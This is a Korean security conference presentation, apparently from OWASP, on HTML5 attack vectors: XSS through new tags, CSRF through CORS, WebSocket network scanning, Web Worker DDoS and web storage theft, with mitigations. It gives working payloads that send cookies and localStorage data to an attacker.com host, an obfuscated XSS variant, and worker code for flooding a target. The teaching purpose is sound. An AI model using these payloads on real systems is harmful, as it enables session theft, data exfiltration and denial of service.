OWASP

Similar documents
XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

Ⅰ. 서론 FOCUS HTML5 는웹문서를제작하기위해사용되는프로그래밍언어인 HTML(Hyper Text Markup Language) 의최신규격을말한다. 기존의 HTML 에서는브라우저자체기능만으로동영상재생, 파일업 / 다운로드, 그래픽 (RIA : Rich Intern

PowerPoint 프레젠테이션

쉽게 풀어쓴 C 프로그래밍

Microsoft PowerPoint - web-part03-ch20-XMLHttpRequest기본.pptx

PowerPoint Template

[로플랫]표준상품소개서_(1.042)

쉽게 풀어쓴 C 프로그래밍

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 :

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D D382E687770>

C H A P T E R 2

#WI DNS DDoS 공격악성코드분석

Windows Live Hotmail Custom Domains Korea

var answer = confirm(" 확인이나취소를누르세요."); // 확인창은사용자의의사를묻는데사용합니다. if(answer == true){ document.write(" 확인을눌렀습니다."); else { document.write(" 취소를눌렀습니다.");

Secure Programming Lecture1 : Introduction

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");

서현수

Ⅰ. 서론 1989년 CERN의 팀 버너스 리에 의해 만들어진 월드 와이드 웹 기술은 HTML(HyperText Markup Language), URL(Unified Resource Locator, HTTP(Hyper- Text Transfer Protocol)이라는

TTA Journal No.157_서체변경.indd

Microsoft PowerPoint - 04-UDP Programming.ppt

<4D F736F F F696E74202D20B5A5C0CCC5CDBAA3C0CCBDBA5F3130C1D6C2F75F32C2F7BDC32E >

슬라이드 1

[Brochure] KOR_TunA

설명 Description 상세정보 네이버에서운영하는서비스중하나인쥬니어네이버 ( 이하쥬니버 ) 에서는쥬니버서비스와 관련하여도움을주기위한 [ 그림 1] 과같은플래시애플리케이션이서비스되고있다.[2] [ 그림 1] 쥬니어네이버에서서비스중인쥬니버도우미플래시애플리케이션 해당플래

1) 인증서만들기 ssl]# cat > // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키


1) 인증서만들기 ssl]# cat > // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

Javascript.pages

EDB 분석보고서 (04.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

PowerPoint 프레젠테이션

이도경, 최덕재 Dokyeong Lee, Deokjai Choi 1. 서론

목 차 1. 개 요 배경 요약 정보 대상시스템 원리 공격 기법 및 기본 개념 Heap Spray Font 공 격..

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코

미쓰리 파워포인트

The Pocket Guide to TCP/IP Sockets: C Version

SSL Strip Attack JAC (SemiDntmd) 이우승 semidntmd.tistory.com

2 PX-8000과 RM-8000/LM-8000등의 관련 제품은 시스템의 간편한 설치와 쉬운 운영에 대한 고급 기술을 제공합니다. 또한 뛰어난 확장성으로 사용자가 요구하는 시스템을 손쉽게 구현할 수 있습니다. 메인컨트롤러인 PX-8000의 BGM입력소스를 8개의 로컬지

Microsoft PowerPoint - 웹프로그래밍_ ppt [호환 모드]

HTTP 2.0 : The New Web Standard and Issue

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

Building Mobile AR Web Applications in HTML5 - Google IO 2012

Javascript

제이쿼리 (JQuery) 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호

Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University

1217 WebTrafMon II

게시판 스팸 실시간 차단 시스템

untitled

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B

Microsoft Word - CrossSiteScripting[XSS].docx

3장

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

(Microsoft Word - \301\266\301\326\272\300_XSS.docx)

0. 들어가기 전

5th-KOR-SANGFOR NGAF(CC)

The Pocket Guide to TCP/IP Sockets: C Version


<4D F736F F F696E74202D E20B3D7C6AEBFF6C5A920C7C1B7CEB1D7B7A1B9D62E >

Microsoft PowerPoint - web-part01-ch10-문서객체모델.pptx

Inside Android Applications

제목 레이아웃

Microsoft PowerPoint - web-part01-ch09-브라우저객체모델.pptx

쉽게 풀어쓴 C 프로그래밍

PowerPoint 프레젠테이션

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

2013 <D55C><ACBD><C5F0><BC31><C11C>(<CD5C><C885>).pdf

Microsoft PowerPoint - Lecture_Note_5.ppt [Compatibility Mode]

Web Scraper in 30 Minutes 강철

혼자서일을다하는 JSP. 이젠일을 Servlet 과나눠서한다. JSP와서블릿의표현적인차이 - JSP는 <html> 내에서자바를사용할수있는수단을제공한다. - 서블릿은자바내에서 <html> 을작성할수있는수단을제공한다. - JSP나서블릿으로만웹페이지를작성하면자바와다양한코드가

Microsoft PowerPoint 세션.ppt

C# Programming Guide - Types

PowerPoint Template

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

HTML5가 웹 환경에 미치는 영향 고 있어 웹 플랫폼 환경과는 차이가 있다. HTML5는 기존 HTML 기반 웹 브라우저와의 호환성을 유지하면서도, 구조적인 마크업(mark-up) 및 편리한 웹 폼(web form) 기능을 제공하고, 리치웹 애플리케이 션(RIA)을

The Pocket Guide to TCP/IP Sockets: C Version

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

FileMaker 15 WebDirect 설명서

로거 자료실

UDP Flooding Attack 공격과 방어

PowerPoint 프레젠테이션

*2008년1월호진짜

(Microsoft Word - Cross Environment Hopping-\271\370\277\252.doc)

MVVM 패턴의 이해

20주년용

슬라이드 1

슬라이드 1

Voice Portal using Oracle 9i AS Wireless

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

playnode.key

HTML5* Web Development to the next level HTML5 ~= HTML + CSS + JS API

Microsoft Word - src.doc


bn2019_2

HTML5 인터넷보충학습자료 (2014) 14 강. HTML API [1] : 오프라인웹, 파일접근, 웹스토리지 14 강. HTML API [1] : 오프라인웹, 파일접근, 웹스토리지 1. 오프라인웹 1.1 오프라인웹애플리케이션 Ÿ 오프라인상태에서도사용이가능한애플리케이

<4D F736F F F696E74202D E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA E >

HTML5 인터넷보충학습자료 (2014) 15 강. HTML API [2] : 웹워커, 웹소켓, 위치정보 15 강. HTML API [2] : 웹워커, 웹소켓, 위치정보 1. 웹워커 1.1 멀티스레드와웹워커 Ÿ 하나의응용프로그램이스레드라불리는처리단위를복수개생성하여동시에

chap 5: Trees

접근성과 웹 The power of the Web is in its universality. Access by everyone regardless of disability is an essential aspect. Tim Berners-Lee, the inventor

Transcription:

및대응 주한익 (joohanik@coresec.co.kr)

About Me 소속및직책 코어시큐리티보안 1 팀장 & 엔지니어 관심분야 웹어플리케이션취약점분석, 악성코드분석 강의및컨퍼런스경력 삼성첨단기술연수소 (APT, 웹어플리케이션보안 ) 경찰수사연수원 ( 웹어플리케이션보안, 악성코드분석 ) 육군, 해군, 공군 ( 소프트웨어취약점분석, 익스플로잇제작 ) 한국전자통신연구원 ( 악성코드분석 ) etc...

Agenda HTML5 개요 ( 등장배경, 기존버전과의차이점 ) HTML5 를이용한웹기반보안위협 추가된속성및태그를이용한 XSS CORS 를이용한 CSRF 웹소켓을이용한사설네트워크정보수집 웹워커를이용한 DDoS 웹스토리지정보탈취 결론및질문

HTML5 개요

HTML5 개요 W3C 와 WHATWG 에서표준화중인차세대웹기반기술 플랫폼, 장치등에의존하지않는웹어플리케이션구현 을원칙으로설계됨 기존버전 (HTML4) 에비해명세의많은부분이바뀜 video/audio 태그 CORS(Cross-Origin Resource Sharing) XHR Level2 웹스토리지 웹워커 웹소켓 etc...

HTML5 개요 명세의많은부분이보안을고려하여설계되었지만웹어플리케이션에적용하는데있어현실적으로많은어려움이있음 결국변경된혹은새롭게추가된기술들로인해공격포인트가넓어지게생김 HTML5 와관련된보안이슈는브라우저가존재하는모든장치 (ex. 휴대전화, 자동차, 가전제품 ) 에서발생할수있음

( 추가된속성및태그를이용한 XSS)

보안위협 ( 추가된속성및태그를이용한 XSS) HTML5 의속성및태그를이용한필터우회 HTML5 에서새롭게추가된속성및태그들은 XSS 공격포인트를증가시킴 기존사용되었던블랙리스트기반필터를우회할수있음 <video><source onerror= alert(1) ></source></video> <audio><source onerror= alert(1) ></source></audio> <select autofocus onfocus= alert(1) > <textarea autofocus onfocus= alert(1) > <input type= text autofocus onfocus= alert(1) >

보안위협 ( 추가된속성및태그를이용한 XSS) video 태그를이용한공격코드예 <video><source onerror= new Image().src= http://www.attacker.com/getcookie.php?cookie= +docum ent.cookie ></source></video> CharCode 인코딩 <video><source onerror=eval(string.fromcharcode(110,101,119,32,73,109,97,103,101, 40,41,46,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46, 97,116,116,97,99,107,101,114,46,99,111,109,47,103,101,116,99,111, 111,107,105,101,46,112,104,112,63,99,111,111,107,105,101,61,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101))></sou rce></video>

보안위협 ( 추가된속성및태그를이용한 XSS) video 태그를이용한공격시나리오예 www.attacker.com 1 XSS 를통한악성스크립트실행 2 쿠키값전달

보안위협 ( 추가된속성및태그를이용한 XSS) XSS 공격에대한추가적인내용은 Mario Heiderich 의 HTML5 Security Cheatsheet 를참조 대응및완화방법 새롭게추가된속성및태그를이용한패턴에대한필터링목록갱신

(CORS 을이용한 CSRF)

(CORS 을이용한 CSRF) 개요 최근에는정보를제공하는사이트에서데이터를가져온후이를재사용하여서비스를창출하는매쉬업형태의사이트가많이만들어지고있음 ex) 하우징맵스 (housingmaps) 이러한사이트는특성상 XHR 을이용하여다른도메인에대한리소스요청을빈번하게발생시킬수밖에없음 이는 SOP(Same Origin Policy) 에위배되므로사이트개발과정에많은불편함을가져옴 하지만 HTML5 의 XHR Level2 COR(Cross- Origin Request) 을통해이를극복할수있게되었음

(CORS 을이용한 CSRF) COR(Cross-Origin Request) XHR Level1 은기본적으로 SOP(Same Origin Policy) 에제한을받기때문에 COR 을발생시킬수없음 하지만 HTML5 의 XHR Level2 는 COR 을지원하여 CORS(Cross-Origin Resource Sharing) 를가능하게함

(CORS 을이용한 CSRF) XHR Level2 를지원하지않는브라우저 XHR Level2 를지원하는브라우저 www.foo.com www.other.com www.foo.com www.other.com

(CORS 을이용한 CSRF) Origin 헤더 XHR Level2 를사용한요청에는기존에없던 Origin 헤더가포함됨 Origin 헤더는 COR 을발생시킨도메인의정보를포함하며해당요청을받은다른도메인측에서출처를확인하기위한용도로사용됨

(CORS 을이용한 CSRF) Access-Control-Allow-Origin 헤더 COR 을받는도메인측에서는 Origin 헤더를통해출처를확인하고응답을구분해서보내줄수있음 COR 을발생시킨브라우저의입장에서보았을때 COR 을받는도메인측에서전달된응답의허용여부는응답에포함된 Access-Control- Allow-Origin 헤더의값에의존함 브라우저는해당헤더의값이 COR 을발생시킨출처의도메인과일치해야해당응답을허용함

(CORS 을이용한 CSRF)

(CORS 을이용한 CSRF) withcredentials 속성 XHR Level2 를기반으로하는 COR 은기본적으로쿠키정보가포함되지않음 XHR 객체에서제공하는 withcredentials 속성을사용하면쿠키정보가포함된 COR 을발생시킬수있음

(CORS 을이용한 CSRF) Access-Control-Allow-Credentials 헤더 쿠키정보가포함된 COR 에대한응답에는반드시 Access-Control-Allow-Credentials : true 헤더가포함되어있어야브라우저가받아들임 해당헤더가포함된응답은 Access-Control- Allow-Origin 헤더의값에 Asterisk(*) 가아닌출처에대한정확한도메인이지정되어있어야함

(CORS 을이용한 CSRF)

(CORS 을이용한 CSRF) CORS 를이용한 CSRF 공격시나리오 1 XSS 를통한악성스크립트실행 www.foo.com 사용자개인정보요청 2 (Cross-Origin Request) www.attacker.com 4 공격자에게사용자개인정보전달 3 사용자개인정보응답 www.other.com

(CORS 을이용한 CSRF) 대응및완화방법 COR 을받아들이는사이트에서는필요하지않다면 Access-Control-Allow-Origin : * 혹은 Access-Control-Allow-Credentials : true 와같은코드패턴을사용하지않아야함

( 웹소켓을이용한사설네트워크 정보수집 )

( 웹소켓을이용한사설네트워크정보수집 ) 개요 HTTP 는프로토콜의특성상브라우저가먼저요청을하면웹서버가이를처리하여응답을수행함 HTTP 요청 / 응답과정이마무리되면기존형성된네트워크세션이종료됨 이러한통신방식은실시간채팅혹은주식정보모니터링과같이네트워크연결을지속적으로유지하여상호간의데이터를실시간으로동기화하는어플리케이션개발에제한이있을수있음 이를보완하기위해기존에는플래시, 플랙스, 실버라이트와같은기술을활용하기도했음 하지만웹소켓은이러한기술에의존하지않고도하나의 TCP 연결을통한양방향통신을가능하게함

( 웹소켓을이용한사설네트워크정보수집 ) 웹소켓기반클라이언트 - 서버연결과정 3-Way H.S 웹소켓 H.S

( 웹소켓을이용한사설네트워크정보수집 ) 웹소켓인터페이스 [Constructor(in DOMString url, in optional DOMString protocol)] interface WebSocket { readonly attribute DOMString URL; // ready state const unsigned short CONNECTING = 0; const unsigned short OPEN = 1; const unsigned short CLOSED = 2; readonly attribute unsigned short readystate; boolean send(in DOMString data); void close(); }; WebSocket implements EventTarget;

( 웹소켓을이용한사설네트워크정보수집 ) 웹소켓의 readystate 속성 CONNECTING(0), OPEN(1), CLOSED(2) 세가지상태정보중하나를가짐 웹소켓이처음생성될때최초 CONNECTING(0) 값을가짐

( 웹소켓을이용한사설네트워크정보수집 ) readystate 속성의 CONNECTING(0) 값지속시간은상황에따라차이가있음 원격시스템의반응유형 0 값지속시간 3-Way H.S 이후바로연결을종료시키는경우 <100ms (0.1 초미만 ) 3-Way H.S 이후응답을한후바로연결을종료시키는경우 <100ms (0.1 초미만 ) 3-Way H.S 이후연결을유지시키면서데이터수신을기다리는경우 3-Way H.S 이후연결을유지하면서 배너 혹은 웰컴 메시지와같은응답을전송하는경우 >30000ms (30 초초과 ) <100ms (FireFox, Safari) >30000ms (Chrome) 원격시스템포트의상태및필터링유무 0 값지속시간 원격시스템의포트가열려있는경우 <100ms (0.1초미만 ) 원격시스템의포트가닫혀있는경우 ~1000ms (1초) 패킷이필터링되었을경우 >30000ms (30초초과 )

( 웹소켓을이용한사설네트워크정보수집 ) 사설네트워크스캐닝과 readystate 속성과의관계 readystate 값이 0 인상태가일정시간을초과하여지속되면필터링되었거나시스템이다운된상태임 redaystate 값이 0 인상태가일정시간안에 1(Open) 혹은 2(Closed) 로바뀐다면시스템은동작중인상태임

( 웹소켓을이용한사설네트워크정보수집 ) 웹소켓을이용한사설네트워크정보수집시나리오 스캐닝결과전달 3 2 내부네트워크스캐닝 1 게시물열람및악성스크립트실행 악성스크립트가게시되어있는사이트

( 웹워커를이용한 DDoS)

( 웹워커를이용한 DDoS) 개요 브라우저는페이지의자바스크립트를처리하기위해일반적으로한개의쓰래드를사용함 이러한방식은자바스크립트코드가무거운웹어플리케이션을구현하는데문제가되기시작함 UI 블로킹 을대표적인예로들수있음 오늘날의브라우저는웹페이지를보는용도를넘어서어플리케이션의플랫폼역할을하고있기때문에이와같은문제들을해결할필요가있음

( 웹워커를이용한 DDoS) 웹워커? 자바스크립트코드를백그라운드에서독립적으로실행하도록해주는 API 백그라운드로실행되는쓰레드를 워커 라고함 다수의워커는운영체제의멀티쓰레드와유사한개념이라고볼수있음 메인페이지 ( 워커를생성한부모페이지 ) 에존재하는 windows 혹은 document 와같은 DOM 객체에대한직접적인접근이불가능함 메인페이지의쓰레드와워커가대화를하기위해서는 postmessage() 메써드를사용해야함

( 웹워커를이용한 DDoS) 메인페이지의 DOM 메인페이지를처리하는쓰레드 UI 조작을위한 DOM 접근 w.postmessage() 를통한데이터전달 워커 self.postmessage() 를통한데이터전달 접근불가능

( 웹워커를이용한 DDoS) 메인페이지를처리하는쓰레드에독립적이며백그라운드형태로실행된다 는웹워커의특징은다양한방식으로악용될수있음 ex. DDoS 공격

( 웹워커를이용한 DDoS) DDoS 공격에사용되는워커를생성하는코드 <video controls= controls width= 640 height= 480 > <source src= PSY-GANGNAM_STYLE.mp4 type= video/mp4 /> </video> <script> var w; var y; If(type(Worker)!== undefined ) { w = new Worker( ddos.js ); // 첫번째워커생성 y = new Worker( ddos.js ); // 두번째워커생성 } </script>

( 웹워커를이용한 DDoS) 워커에의해실행되는자바스크립트코드 If (!xmlhttp && typeof XMLHttpRequest!= undefined ) { xmlhttp = new XMLHttpRequest(); } temp = http://www.ddostarget.com/index.php?p= + Math.random(); // XHR 객체를이용하여 www.ddostarget.com 에 HTTP 트래픽을발생시킴 xmlhttp.open( GET, temp, true); xmlhttp.sedn(null);

( 웹워커를이용한 DDoS) 웹워커를이용한 DDoS 공격시나리오 1 게시물열람및링크클릭 3 웹워커에의한 DDoS 트래픽발생 2 동영상을재생하면서웹워커실행 victim s browser victim s browser victim s browser

( 웹스토리지정보탈취 )

( 웹스토리지정보탈취 ) 개요 웹스토리지 (DOM 스토리지 ) 는클라이언트의브라우저에키 - 값형태로데이터를저장하고관리할수있도록해주는 API 현재웹상에서많이사용되고있는쿠키를대체할차세대기술로주목받고있음

( 웹스토리지정보탈취 ) 웹스토리지의특징 도메인당평균적으로 5MB 정도의공간을지원함 HTTP 요청헤더에데이터가자동으로포함되지않음 연관배열형태의데이터접근및관리메커니즘제공 로컬스토리지 와 세션스토리지 로나누어짐

( 웹스토리지정보탈취 ) 로컬스토리지 vs 세션스토리지 도메인마다별도의영역이생성된다는공통점을가지고있음 유효범위와생존기간부분에서차이점을보임

( 웹스토리지정보탈취 ) 세션스토리지 로컬스토리지 윈도우객체 www.a.com 의세션스토리지 www.b.com 의세션스토리지 윈도우객체 도메인별로별도의로컬스토리지가할당되며, 윈도우가달라도동일한도메인일경우공유함 도메인이다르므로별도의세션스토리지가할당됨윈도우가다르면같은도메인에접근해도별도의세션스토리지가할당됨 www.a.com 의로컬스토리지 www.b.com 의로컬스토리지 윈도우객체 www.a.com 의세션스토리지 윈도우객체 도메인별로별도의로컬스토리지가할당되며, 윈도우가달라도동일한도메인일경우공유함

( 웹스토리지정보탈취 ) YouTube 의경우사용자의재생목록, 재생화면크기, 볼륨등의설정관련정보를로컬스토리지에기록함 context-ixsn81squ6e yt-player-volume {"data":"{\"clickindex\":3,\"items\":[{\"type\ {"volume":100,"nonnormalized":null,"muted":false}

( 웹스토리지정보탈취 ) 웹스토리지인터페이스 interface Storage { readonly attribute unsigned long length; DOMString key(unsigned long index); getter DOMString getitem(domstring key); setter creator void setitem(domstring key, DOMString value); delete void removeitem(domstring key); void clear(); };

( 웹스토리지정보탈취 ) 브라우저의웹스토리지데이터를탈취하는코드예 var contents = ; if(localstorage.length) { for(i in localstorage) { Contents += i+ : +localstorage.getitem(i)+ \n ; } } new Image().src = http://www.attacker.com/getlocalstorage.php= +encodeuricomponent (contents);

( 웹스토리지정보탈취 ) 브라우저의웹스토리지데이터탈취시나리오 해당사용자의방문회수, 최근게시한게시물의제목등을로컬스토리지에기록하고있음 www.attacker.com 2 공격자에게스토리지데이터전달 1 게시물열람및악성스크립트실행

References & Resources Mario Heiderich s HTML5 Security Cheatsheet http://heideri.ch/jso/ Attack & Defense Lab http://www.andlabs.org/ Performing DDoS Attacks in a web page http://lyric.im/performing-ddos-attacks-in-a-web-page/ HTML5 localstorage Attack Vectors & Security by Shreeraj Shah http://www.slideshare.net/fullscreen/shreeraj/html5-localstorageattack-vectors/1

결론및질문